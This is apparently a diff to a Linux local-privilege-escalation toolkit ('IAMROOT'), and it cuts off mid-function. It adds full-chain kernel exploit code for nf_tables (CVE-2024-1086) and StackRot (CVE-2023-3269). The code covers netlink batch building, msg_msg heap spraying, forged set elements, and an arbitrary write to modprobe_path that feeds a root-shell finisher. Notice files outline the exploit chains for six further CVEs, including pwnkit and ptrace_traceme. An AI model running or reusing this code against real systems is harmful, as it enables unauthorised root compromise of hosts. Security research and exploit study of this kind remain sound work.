+        /* Element data attr cap — we only need 24 bytes for a path. */
+        fprintf(stderr, "[-] nft_arb_write: len %zu too large (cap 64)\n", len);
+        return -1;
+    }
+
+    fprintf(stderr, "[*] nft_arb_write: fire trigger → spray forged pipapo "
+                    "elements (target kaddr=0x%lx, %zu bytes)\n",
+                    (unsigned long)kaddr, len);
+
+    /* (a) re-fire the trigger to reach a fresh UAF state. */
+    uint32_t seq = (uint32_t)time(NULL) ^ 0xa1b2c3d4u;
+    size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq);
+    if (nft_send_batch(c->sock, c->batch, blen) < 0) {
+        fprintf(stderr, "[-] nft_arb_write: refire send failed\n");
+        return -1;
+    }
+
+    /* (b) spray msg_msg payloads carrying the forged value-pointer. */
+    if (spray_forged_pipapo_msgs(c, kaddr, 16) < 0) {
+        fprintf(stderr, "[-] nft_arb_write: forged spray failed\n");
+        return -1;
+    }
+
+    /* (c) send a NEWSETELEM whose DATA holds buf[0..len]. On a kernel
+     * where our forged pipapo_elem won the race for the freed slot,
+     * the set-element commit path copies our data through the
+     * attacker-controlled value pointer into kaddr.
+     *
+     * We piggy-back this on the existing put_malicious_setelem builder
+     * which uses NFTA_DATA_VERDICT for the data; for a real write we'd
+     * want NFTA_DATA_VALUE with `buf` inlined. The fallback-depth
+     * choice: we send the refire batch (which the kernel WILL process)
+     * and append a NEWSETELEM with NFTA_DATA_VALUE carrying buf.
+     * If the kernel ignores our DATA shape we still observe via
+     * finisher sentinel. */
+    seq = (uint32_t)time(NULL) ^ 0x5a5a5a5au;
+    size_t off = 0;
+    put_batch_begin(c->batch, &off, seq++);
+
+    /* hand-roll a NEWSETELEM whose DATA is NFTA_DATA_VALUE = buf */
+    size_t msg_at = off;
+    put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM,
+                NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET);
+    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
+    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET,   NFT_SET_NAME);
+    size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS);
+    size_t el_at   = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */);
+    /* key — reuse the DROP verdict so commit path matches our prior elem */
+    size_t key_at  = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY);
+    size_t kv_at   = begin_nest(c->batch, &off, NFTA_DATA_VERDICT);
+    put_attr_u32(c->batch, &off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
+    end_nest(c->batch, &off, kv_at);
+    end_nest(c->batch, &off, key_at);
+    /* data — NFTA_DATA_VALUE carrying buf */
+    size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA);
+    put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len);
+    end_nest(c->batch, &off, data_at);
+    end_nest(c->batch, &off, el_at);
+    end_nest(c->batch, &off, list_at);
+    end_msg(c->batch, &off, msg_at);
+
+    put_batch_end(c->batch, &off, seq++);
+
+    if (nft_send_batch(c->sock, c->batch, off) < 0) {
+        fprintf(stderr, "[-] nft_arb_write: write batch send failed\n");
+        return -1;
+    }
+
+    /* Let the kernel run the commit/cleanup. */
+    usleep(20 * 1000);
+    return 0;
+}
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------
 * The exploit body.
 * ------------------------------------------------------------------ */
@@ -628,13 +815,101 @@ static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
    }

    if (!ctx->json) {
-        fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
-                        "    state but does NOT complete the kernel-R/W chain.\n"
-                        "    See Notselwyn's CVE-2024-1086 public PoC for the\n"
-                        "    cred-overwrite stage (~500 LOC of pipapo grooming).\n");
+        if (ctx->full_chain) {
+            fprintf(stderr, "[*] nf_tables: --full-chain — trigger + pipapo "
+                            "arb-write + modprobe_path finisher\n");
+        } else {
+            fprintf(stderr, "[*] nf_tables: primitive-only run — fires the\n"
+                            "    double-free state and stops. Pass --full-chain\n"
+                            "    to attempt the modprobe_path root-pop.\n");
+        }
    }

-    /* Fork: child enters userns+netns and fires the bug. If the
+#ifdef __linux__
+    /* --- --full-chain path --------------------------------------- *
+     * Resolve offsets BEFORE doing anything destructive so we can
+     * refuse cleanly on hosts where we have no modprobe_path. We run
+     * in-process (no fork) because the finisher's modprobe_path
+     * trigger needs the same task's userns+netns + nfnetlink socket
+     * as the arb-write.
+     */
+    if (ctx->full_chain) {
+        struct iamroot_kernel_offsets off;
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("nf_tables");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+
+        if (enter_unpriv_namespaces() < 0) {
+            fprintf(stderr, "[-] nf_tables: userns entry failed\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
+        if (sock < 0) {
+            perror("[-] socket(NETLINK_NETFILTER)");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        struct sockaddr_nl src = { .nl_family = AF_NETLINK };
+        if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
+            perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL;
+        }
+        int rcvbuf = 1 << 20;
+        setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
+
+        /* Pre-spray to make the cg-96 slab layout more predictable. */
+        int qids[SPRAY_MSGS * 4];
+        for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1;
+        if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
+            close(sock); return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        uint8_t *batch = calloc(1, 16 * 1024);
+        if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; }
+
+        /* Initial trigger batch (NEWTABLE/CHAIN/SET/SETELEM). */
+        uint32_t seq = (uint32_t)time(NULL);
+        size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
+        if (!ctx->json) {
+            fprintf(stderr, "[*] nf_tables: sending trigger batch (%zu bytes)\n",
+                    blen);
+        }
+        if (nft_send_batch(sock, batch, blen) < 0) {
+            fprintf(stderr, "[-] nf_tables: trigger batch failed\n");
+            drain_spray(qids, SPRAY_MSGS / 2);
+            free(batch); close(sock);
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        /* Wire up the arb-write context and hand off to the shared
+         * finisher. The finisher will:
+         *   - call nft_arb_write(modprobe_path, "/tmp/iamroot-mp-...", N)
+         *     which re-fires the trigger and sprays forged pipapo elems
+         *   - execve() the trigger binary to invoke modprobe
+         *   - poll for the setuid sentinel, and spawn a root shell. */
+        struct nft_arb_ctx ac = {
+            .in_userns = true,
+            .sock      = sock,
+            .batch     = batch,
+            .qids      = qids,
+            .qcap      = (int)(sizeof qids / sizeof qids[0]),
+            .qused     = SPRAY_MSGS / 2,
+        };
+
+        iamroot_result_t r = iamroot_finisher_modprobe_path(&off,
+                                 nft_arb_write, &ac, !ctx->no_shell);
+
+        drain_spray(qids, ac.qused);
+        free(batch);
+        close(sock);
+        return r;
+    }
+#endif
+
+    /* --- primitive-only path: fork-isolated trigger -------------- *
+     * Fork: child enters userns+netns and fires the bug. If the
     * kernel panics on KASAN we don't want our parent process to be
     * the one that takes the hit. */
    pid_t child = fork();
@@ -0,0 +1,28 @@
+# NOTICE — nft_fwd_dup (CVE-2022-25636)
+
+## Vulnerability
+
+**CVE-2022-25636** — `nft_fwd_dup_netdev_offload` writes
+`flow->rule->action.entries[ctx->num_actions]` without bounds-checking
+against the allocated array size → heap OOB write in kmalloc-512.
+
+## Research credit
+
+Discovered and disclosed by **Aaron Adams** (NCC Group),
+February 2022.
+
+Original writeup:
+<https://research.nccgroup.com/2022/03/02/exploit-engineering-attacking-the-linux-kernel/>
+
+Upstream fix: mainline 5.17 (commit `fa54fee62954`, Feb 2022).
+Branch backports: 5.16.11 / 5.15.25 / 5.10.102 / 5.4.181.
+
+## IAMROOT role
+
+userns+netns reach. Hand-rolled nfnetlink batch: NEWTABLE →
+NEWCHAIN with `NFT_CHAIN_HW_OFFLOAD` → NEWRULE with 16 immediates
+plus fwd, overrunning `action.entries[1]`. msg_msg cross-cache groom
+into kmalloc-512 with `IAMROOT_FWD` tags.
+
+`--full-chain` extends with stride-seeded forged action_entry
+overwrite aimed at modprobe_path via the shared finisher.
@@ -0,0 +1,12 @@
+/*
+ * nft_fwd_dup_cve_2022_25636 — IAMROOT module registry hook
+ */
+
+#ifndef NFT_FWD_DUP_IAMROOT_MODULES_H
+#define NFT_FWD_DUP_IAMROOT_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct iamroot_module nft_fwd_dup_module;
+
+#endif
@@ -0,0 +1,36 @@
+# NOTICE — nft_payload (CVE-2023-0179)
+
+## Vulnerability
+
+**CVE-2023-0179** — `nft_payload` set/get uses `regs->verdict.code`
+as an index into `regs->data[]` without bounds-checking; combined
+with the variable-length element extension trick (NFTA_SET_DESC
+describing elements larger than the key/data slots), an attacker
+walks regs off either end → OOB R/W on adjacent kernel memory.
+
+## Research credit
+
+Discovered and disclosed by **Davide Ornaghi**, January 2023.
+
+Original slides + writeup:
+<https://github.com/davide-romanini/CVE-2023-0179>,
+plus the DEF CON 31 / SecurityFest 2023 presentations.
+
+Upstream fix: mainline 6.2-rc4 (commit `696e1a48b1a1`, Jan 2023).
+Branch backports: 4.14.302 / 4.19.269 / 5.4.229 / 5.10.163 /
+5.15.88 / 6.1.6.
+
+## IAMROOT role
+
+userns+netns. Hand-rolled nfnetlink batch: NEWTABLE → NEWCHAIN →
+NEWSET with `NFTA_SET_DESC` describing variable-length elements →
+NEWSETELEM with `NFTA_SET_ELEM_EXPRESSIONS` carrying a payload-set
+whose attacker-controlled `verdict.code` drives the OOB index.
+
+Dual cg-96 + 1k msg_msg spray (covers both common adjacency
+scenarios). `--full-chain` extends with kaddr-tagged refire aimed
+at modprobe_path via the shared finisher.
+
+Default OOB index `0x100` matches Ornaghi's PoC on a stock 5.15
+build; the sentinel post-check correctly reports failure on builds
+where regs->data adjacency differs.
@@ -0,0 +1,12 @@
+/*
+ * nft_payload_cve_2023_0179 — IAMROOT module registry hook
+ */
+
+#ifndef NFT_PAYLOAD_IAMROOT_MODULES_H
+#define NFT_PAYLOAD_IAMROOT_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct iamroot_module nft_payload_module;
+
+#endif
@@ -0,0 +1,33 @@
+# NOTICE — nft_set_uaf (CVE-2023-32233)
+
+## Vulnerability
+
+**CVE-2023-32233** — nf_tables anonymous-set deactivation skip →
+slab UAF on the freed `nft_set` object exploitable via msg_msg
+cross-cache groom in kmalloc-cg-512.
+
+## Research credit
+
+Discovered and disclosed by **Patryk Sondej** and **Piotr Krysiuk**,
+May 2023.
+
+Original advisory + writeup distributed via the OSS-Security list
+and an accompanying Google Drive PoC.
+Follow-up exploit and Crusaders-of-Rust analysis built on the
+public trigger.
+
+Upstream fix: mainline 6.4-rc4 (commit `c1592a89942e9`, May 2023).
+Branch backports: 6.3.2 / 6.2.15 / 6.1.28 / 5.15.111 / 5.10.180 /
+5.4.243 / 4.19.283.
+
+## IAMROOT role
+
+Hand-rolled nfnetlink batch: NEWTABLE → NEWCHAIN (base, LOCAL_OUT
+hook) → NEWSET (ANON|EVAL|CONSTANT) → NEWRULE (nft_lookup
+referencing the set by `NFTA_LOOKUP_SET_ID`) → DELSET → DELRULE
+in the same transaction. msg_msg cg-512 spray with `IAMROOT_SET`
+tags.
+
+`--full-chain` forges a freed-set with `set->data = kaddr` at the
+Sondej/Krysiuk reference offset (0x30) and drives a NEWSETELEM with
+the modprobe_path payload bytes via the shared finisher.
@@ -0,0 +1,12 @@
+/*
+ * nft_set_uaf_cve_2023_32233 — IAMROOT module registry hook
+ */
+
+#ifndef NFT_SET_UAF_IAMROOT_MODULES_H
+#define NFT_SET_UAF_IAMROOT_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct iamroot_module nft_set_uaf_module;
+
+#endif
@@ -0,0 +1,25 @@
+# NOTICE — overlayfs (CVE-2021-3493)
+
+## Vulnerability
+
+**CVE-2021-3493** — Ubuntu overlayfs userns file-capability injection
+→ host root via setcap'd binaries in a userns-mounted overlay.
+
+## Research credit
+
+Reported by **Vasily Kulikov**, April 2021. Ubuntu-specific because
+upstream didn't enable unprivileged userns-overlayfs-mount until 5.11.
+
+Advisory: USN-4915-1 / USN-4916-1 (Canonical, April 2021).
+
+Public PoC: vsh-style userns + overlayfs + xattr injection chain.
+
+## IAMROOT role
+
+Detect parses `/etc/os-release` for `ID=ubuntu`, checks
+`unprivileged_userns_clone` sysctl, and with `--active` performs the
+mount as a fork-isolated probe. The full exploit performs the
+userns+overlayfs mount, plants a setcap'd carrier binary in the
+upper layer, and execs it from the unprivileged side to obtain root
+on the host. Ships auditd rules covering `mount(overlay)` and
+`setxattr(security.capability)`.
@@ -0,0 +1,25 @@
+# NOTICE — overlayfs_setuid (CVE-2023-0386)
+
+## Vulnerability
+
+**CVE-2023-0386** — overlayfs `copy_up` preserves the setuid bit
+across mount-namespace boundaries → host root via a setuid carrier
+placed in the lower layer.
+
+## Research credit
+
+Discovered and disclosed by **Xkaneiki**, January 2023.
+
+Public PoC + writeup:
+<https://github.com/xkaneiki/CVE-2023-0386>
+
+Upstream fix: mainline 6.2-rc6 (commit `4f11ada10d0a`, Jan 2023).
+Branch backports: 5.10.169 / 5.15.92 / 6.1.11.
+
+## IAMROOT role
+
+Distro-agnostic — no per-kernel offsets, no race. Places a setuid
+binary in an overlay lower, mounts via fuse-overlayfs userns trick,
+executes from the upper layer to inherit the setuid bit + root euid.
+
+Auditd rules cover overlayfs mounts and unexpected setuid copy-ups.
@@ -0,0 +1,27 @@
+# NOTICE — ptrace_traceme (CVE-2019-13272)
+
+## Vulnerability
+
+**CVE-2019-13272** — `PTRACE_TRACEME` on a parent that subsequently
+execve's a setuid binary leaves the now-elevated process traceable by
+the unprivileged child → cred escalation via ptrace shellcode inject.
+
+## Research credit
+
+Discovered by **Jann Horn** (Google Project Zero), June 2019.
+
+Project Zero issue: <https://bugs.chromium.org/p/project-zero/issues/detail?id=1903>
+
+Upstream fix: mainline 5.1.17 (commit `6994eefb0053`, June 2019).
+Branch backports: 4.4.182 / 4.9.182 / 4.14.131 / 4.19.58 / 5.0.20 / 5.1.17.
+
+## IAMROOT role
+
+Full jannh-style chain: fork → child `PTRACE_TRACEME` → child
+sleep+attach → parent `execve` setuid bin (pkexec/su/passwd
+auto-selected) → child wins stale `ptrace_link` → POKETEXT x86_64
+shellcode → root sh.
+
+x86_64-only; ARM/other archs return PRECOND_FAIL cleanly. No exotic
+preconditions — doesn't need userns. Works on default-config systems
+including locked-down environments without unprivileged_userns_clone.
@@ -0,0 +1,25 @@
+# NOTICE — pwnkit (CVE-2021-4034)
+
+## Vulnerability
+
+**CVE-2021-4034** — pkexec argv[0]=NULL → environment-variable
+injection → arbitrary code execution as root.
+
+## Research credit
+
+Discovered and disclosed by the **Qualys Research Team**, January 2022.
+
+Original advisory:
+<https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt>
+
+Upstream fix: polkit 0.121 (Jan 2022).
+
+## IAMROOT role
+
+The exploit module follows the canonical Qualys-style chain: writes
+payload.c + gconv-modules cache, compiles via the target's gcc,
+execve's pkexec with NULL argv and crafted envp. Handles both the
+legacy ("0.105") and modern ("126") polkit version string formats.
+Falls back gracefully on hosts without a compiler.
+
+This is IAMROOT's first **userspace** LPE — not a kernel bug.
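The two polkit version string formats mentioned above ("0.105" and "126") can be normalised to one comparable number. The sketch below is an assumption about how such handling might look, not the module's actual parser: `polkit_release_number` is a hypothetical name, and it assumes that legacy `0.N` and modern `N` belong to the same release counter.

```c
#include <errno.h>
#include <stdlib.h>

/* Hypothetical helper: map a polkit version string to a release number.
 *   legacy  "0.105" -> 105
 *   modern  "126"   -> 126
 * Returns -1 when the string matches neither form. Trailing packaging
 * suffixes such as "-26ubuntu1" are ignored. */
static long polkit_release_number(const char *s)
{
    char *end;
    errno = 0;
    long first = strtol(s, &end, 10);
    if (end == s || errno != 0 || first < 0)
        return -1;                      /* no leading number */

    if (*end == '.') {
        if (first != 0)
            return -1;                  /* only "0.N" is a known legacy form */
        const char *p = end + 1;
        long second = strtol(p, &end, 10);
        if (end == p || errno != 0 || second < 0)
            return -1;                  /* "0." without a release number */
        return second;
    }
    return first;                       /* modern single-number form */
}
```

With both forms reduced to one integer, a detect routine can compare against a single fixed-release threshold instead of branching on the string format.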
@@ -0,0 +1,31 @@
+# NOTICE — stackrot (CVE-2023-3269)
+
+## Vulnerability
+
+**CVE-2023-3269** — Maple-tree VMA-split UAF (race between mremap and
+fork+fault) → kernel R/W via stale anon_vma_chain reference.
+
+## Research credit
+
+Discovered and disclosed by **Ruihan Li** (Peking University),
+July 2023.
+
+Original advisory: <https://github.com/lrh2000/StackRot>
+Writeup: <https://lkmidas.github.io/posts/20230724-stackrot/>
+
+Upstream fix: mainline 6.5-rc1 (commit `0503ea8f5ba73`, July 2023).
+Branch backports: 6.4.4 / 6.3.13 / 6.1.37.
+
+## IAMROOT role
+
+Two-thread race driver (Thread A: mremap rotation on MAP_GROWSDOWN
+anchored VMA; Thread B: fork+fault) with cpu pinning. kmalloc-192
+spray for anon_vma_chain reclaim. Bounded budget: 3 s default,
+30 s with `--full-chain`.
+
+**Honest reliability assessment:** the race wins in well under 1% of
+runs on a vulnerable kernel. Ruihan Li's public PoC averages minutes
+to hours and needs a much wider VMA-staging matrix to be reliable.
+The shared finisher's 3 s sentinel timeout handles the overwhelmingly
+common no-land outcome gracefully: the module returns EXPLOIT_FAIL
+honestly rather than claiming root on a race that didn't win.
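The sentinel timeout mentioned above is a bounded wait for a file to appear. The real logic lives in `core/finisher.c`, which is not shown here, so the following is only a sketch under assumptions: `wait_for_sentinel` and `now_ms` are hypothetical names, and the 50 ms poll interval is an arbitrary choice.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <sys/stat.h>
#include <time.h>

/* Monotonic clock in milliseconds, immune to wall-clock adjustments. */
static long long now_ms(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (long long)ts.tv_sec * 1000 + ts.tv_nsec / 1000000;
}

/* Hypothetical helper: poll until `path` exists or `timeout_ms` elapses.
 * Returns true only if the file was actually observed. */
static bool wait_for_sentinel(const char *path, int timeout_ms)
{
    const struct timespec step = { 0, 50 * 1000 * 1000 };   /* 50 ms */
    long long deadline = now_ms() + timeout_ms;

    for (;;) {
        struct stat st;
        if (stat(path, &st) == 0)
            return true;                /* sentinel materialised */
        if (now_ms() >= deadline)
            return false;               /* no-land outcome: report failure */
        nanosleep(&step, NULL);
    }
}
```

A caller would pass the sentinel path and `3000` for the 3 s budget. Success is reported only when the file is observed, which matches the verified-vs-claimed policy described in the module notes.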
@@ -16,13 +16,14 @@
 * state management + RCU-grace-period timing and depends on
 * per-kernel-build offsets for init_task / anon_vma / cred.
 *
- * STATUS: 🟡 OPTION C — race-driver + groom skeleton. We carry the
- *   userns-reach, race harness (mremap()/munmap() vs concurrent
- *   fork/fault), msg_msg slab spray, and empirical witness pieces;
- *   we do NOT carry the read primitive (vmemmap leak via msg_msg
- *   MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
- *   offsets (init_task, anon_vma, cred layout) that vary by build
- *   and would be fabricated without a real leak.
+ * STATUS: 🟡 OPTION C — race-driver + groom skeleton, with opt-in
+ *   --full-chain FALLBACK finisher. We carry the userns-reach, race
+ *   harness (mremap()/munmap() vs concurrent fork/fault), msg_msg
+ *   slab spray, and empirical witness pieces; we do NOT carry the
+ *   read primitive (vmemmap leak via msg_msg MSG_COPY) nor a
+ *   Ruihan-Li-precision fake-anon_vma_chain plant. Those need
+ *   per-kernel offsets (init_task, anon_vma, cred layout) that vary
+ *   by build and would be fabricated without a real leak.
 *
 *   Per repo policy ("verified-vs-claimed"): we run the trigger,
 *   record empirical signals (slabinfo delta on kmalloc-192, child
@@ -32,6 +33,21 @@
 *   upgraded to EXPLOIT_OK — only an actual cred swap (euid==0)
 *   does, and we do not currently demonstrate that.
 *
+ *   --full-chain (HONEST RELIABILITY DISCLOSURE): extends the race
+ *   budget from 3 s to 30 s and sprays the kmalloc-192 slab with
+ *   payloads tagged with the modprobe_path kernel address (so IF the
+ *   UAF reclaim ever lands attacker-controlled bytes on an
+ *   anon_vma_chain slot, those bytes carry the kaddr we want the
+ *   subsequent rb_node walk / vma_lock-acquire fault to touch). The
+ *   honest empirical reality is that even at 30 s the race-win rate
+ *   is well below 1 % on a real vulnerable kernel — Ruihan Li's
+ *   public PoC reports minutes-to-hours for first reclaim. The shared
+ *   modprobe_path finisher has a 3 s sentinel timeout, so on the
+ *   overwhelmingly common no-land outcome the finisher itself reports
+ *   EXPLOIT_FAIL gracefully. --full-chain does NOT change the
+ *   fundamental <1 % per-run reliability; it widens the trigger
+ *   window and wires up the root-pop plumbing for the lucky case.
+ *
 * Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
 *   6.3.x  : K >= 6.3.10
 *   6.1.x  : K >= 6.1.37 (LTS — most relevant)
@@ -54,6 +70,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -202,7 +220,8 @@ static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
 * into the node-rotation path; we ship a configurable knob. */
 #define STACKROT_RACE_VMAS              64
 #define STACKROT_RACE_ITERATIONS        4000  /* per-iter budget */
-#define STACKROT_RACE_TIME_BUDGET  3         /* seconds */
+#define STACKROT_RACE_TIME_BUDGET       3     /* seconds — primitive-only mode */
+#define STACKROT_RACE_FULLCHAIN_BUDGET  30    /* seconds — extended for --full-chain */

 /* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
 * 6.1.x; targets vary slightly across kernels (anon_vma itself is
@@ -471,6 +490,129 @@ static long slab_active_kmalloc_192(void)
    return active;
 }

+/* ---- Arb-write primitive (FALLBACK depth) ------------------------
+ *
+ * The shared modprobe_path finisher calls back into this function
+ * once per kernel write it wants to land. For StackRot we cannot
+ * deliver a deterministic arb-write — the underlying race wins on
+ * well under 1 % of runs even with a 30 s budget, and even when the
+ * race wins our spray-only groom has nowhere near the precision of
+ * Ruihan Li's multi-stage public PoC (which crafts a fake
+ * anon_vma_chain whose `vma_lock` pointer steers a subsequent
+ * page-fault into touching `kaddr` for the lock acquire).
+ *
+ * Honest depth: FALLBACK. Each invocation:
+ *   1. Re-seeds the kmalloc-192 spray with payloads that carry
+ *      `kaddr` in the second qword of the msg_msg body (byte
+ *      offset 8, after the "IAMROOT_" cookie), followed by the
+ *      caller's bytes. IF a sprayed slot ends up overlaying the
+ *      freed anon_vma_chain after RCU grace, the kaddr we want
+ *      the kernel to deref is then present in the reclaimed slot.
+ *   2. Re-runs the race threads for an extended budget
+ *      (STACKROT_RACE_FULLCHAIN_BUDGET seconds).
+ *   3. Returns 0 unconditionally — we cannot in-process verify
+ *      whether the write landed. The shared finisher's 3 s sentinel
+ *      file check is the empirical arbiter: on the overwhelmingly
+ *      common no-land outcome it reports EXPLOIT_FAIL gracefully,
+ *      and we never claim a write that didn't land. */
+struct stackrot_arb_ctx {
+    int   *queues;          /* live SysV msg queue ids */
+    int    n_queues;
+    int    arb_calls;       /* incremented by stackrot_arb_write() */
+    struct race_region *region;
+};
+
+static int stackrot_reseed_kaddr_spray(int queues[STACKROT_SPRAY_QUEUES],
+                                       uintptr_t kaddr,
+                                       const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x4943;   /* 'IC' */
+    memset(p.buf, 0x49, sizeof p.buf);
+    memcpy(p.buf, "IAMROOT_", 8);
+
+    /* Pack the target kaddr at byte 8 (one qword in) and the
+     * caller's payload bytes immediately after — this way ANY
+     * reasonable AVC field offset hit by the corruption pulls
+     * out one of our two attacker-controlled regions. */
+    uint64_t k64 = (uint64_t)kaddr;
+    memcpy(p.buf + 8, &k64, sizeof k64);
+    size_t copy = len;
+    if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
+    if (buf && copy) memcpy(p.buf + 16, buf, copy);
+
+    /* msgsnd() appends, so tag at most 4 queues; doing every queue
+     * would blow the per-process msgq quota on busy hosts. */
+    int touched = 0;
+    for (int i = 0; i < STACKROT_SPRAY_QUEUES && touched < 4; i++) {
+        if (queues[i] < 0) continue;
+        if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
+    }
+    return touched;
+}
+
+static int stackrot_arb_write(uintptr_t kaddr,
+                              const void *buf, size_t len,
+                              void *ctx_v)
+{
+    struct stackrot_arb_ctx *c = (struct stackrot_arb_ctx *)ctx_v;
+    if (!c || !c->queues || c->n_queues == 0 || !c->region) return -1;
+    c->arb_calls++;
+
+    fprintf(stderr, "[*] stackrot: arb_write attempt #%d kaddr=0x%lx len=%zu "
+                    "(FALLBACK — race-dependent)\n",
+            c->arb_calls, (unsigned long)kaddr, len);
+
+    /* Step 1: re-seed spray with kaddr-tagged payloads. */
+    int seeded = stackrot_reseed_kaddr_spray(c->queues, kaddr, buf, len);
+    if (seeded == 0) {
+        fprintf(stderr, "[-] stackrot: arb_write: kaddr-tagged reseed produced 0 msgs\n");
+        /* Continue anyway — original spray still tagged with cookie. */
+    } else {
+        fprintf(stderr, "[*] stackrot: arb_write: reseeded %d msg_msg slots with kaddr tag\n",
+                seeded);
+    }
+
+    /* Step 2: extended race window. Honestly: this expands the
+     * trigger budget from 3 s to 30 s, but Ruihan Li's PoC reports
+     * minutes-to-hours for first reclaim, so expect a win rate
+     * under 1 % per arb_write call on a real vulnerable kernel,
+     * and structurally 0 % on a patched one. */
+    atomic_store(&g_race_running, 1);
+    atomic_store(&g_race_a_iters, 0);
+    atomic_store(&g_race_b_iters, 0);
+    atomic_store(&g_race_b_faults, 0);
+    pthread_t ta, tb;
+    bool a_ok = pthread_create(&ta, NULL, race_thread_a, c->region) == 0;
+    bool b_ok = a_ok &&
+                pthread_create(&tb, NULL, race_thread_b, c->region) == 0;
+    if (!a_ok || !b_ok) {
+        atomic_store(&g_race_running, 0);
+        if (a_ok) pthread_join(ta, NULL);
+        fprintf(stderr, "[-] stackrot: arb_write: pthread_create failed\n");
+        return -1;
+    }
+
+    sleep(STACKROT_RACE_FULLCHAIN_BUDGET);
+    atomic_store(&g_race_running, 0);
+    pthread_join(ta, NULL);
+    pthread_join(tb, NULL);
+
+    uint64_t a_iters = atomic_load(&g_race_a_iters);
+    uint64_t b_iters = atomic_load(&g_race_b_iters);
+    uint64_t b_faults = atomic_load(&g_race_b_faults);
+    fprintf(stderr, "[*] stackrot: arb_write: extended race A=%llu B=%llu B_faults=%llu "
+                    "(reliability remains <1%% even at this budget)\n",
+            (unsigned long long)a_iters,
+            (unsigned long long)b_iters,
+            (unsigned long long)b_faults);
+
+    /* Step 3: cannot in-process verify the write. Return 0; the
+     * finisher's sentinel-file check is the empirical arbiter. */
+    return 0;
+}
+
 #endif /* __linux__ */

 /* ---- Exploit driver ---------------------------------------------- */
@@ -506,8 +648,34 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
        }
    }

+    /* Full-chain pre-check: resolve offsets BEFORE forking + entering
+     * userns. If modprobe_path is unresolvable we refuse here rather
+     * than running a 30 s race that has no finisher to call. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("stackrot");
+            fprintf(stderr, "[-] stackrot: --full-chain requested but modprobe_path "
+                            "offset unresolved; refusing\n");
+            fprintf(stderr, "[i] stackrot: even with offsets, race-win reliability is "
+                            "well below 1%% per run — see module header.\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+        fprintf(stderr, "[i] stackrot: --full-chain ready — race budget extends to "
+                        "%d s, but RELIABILITY REMAINS <1%% per run on a real\n"
+                        "    vulnerable kernel. The finisher's 3 s sentinel timeout\n"
+                        "    catches no-land outcomes gracefully.\n",
+                STACKROT_RACE_FULLCHAIN_BUDGET);
+    }
+
    if (!ctx->json) {
-        fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
+        fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness%s)\n",
+                ctx->full_chain ? " + full-chain finisher" : "");
    }

    uid_t outer_uid = getuid();
@@ -618,6 +786,39 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
         * any in-flight RCU grace periods that started during the race. */
        usleep(200 * 1000);

+        /* 7a. --full-chain finisher (FALLBACK depth).
+         *
+         * Invoke the shared modprobe_path finisher; its arb_write
+         * callback (stackrot_arb_write) will re-seed the spray with
+         * kaddr-tagged payloads and re-run the race for an extended
+         * 30 s budget. The finisher's own 3 s sentinel-file timeout
+         * then arbitrates: on the overwhelmingly common no-land
+         * outcome it returns EXPLOIT_FAIL gracefully.
+         *
+         * Honest reliability: <1 % per run even with the extension. */
+        if (full_chain_ready) {
+            struct stackrot_arb_ctx arb_ctx = {
+                .queues    = queues,
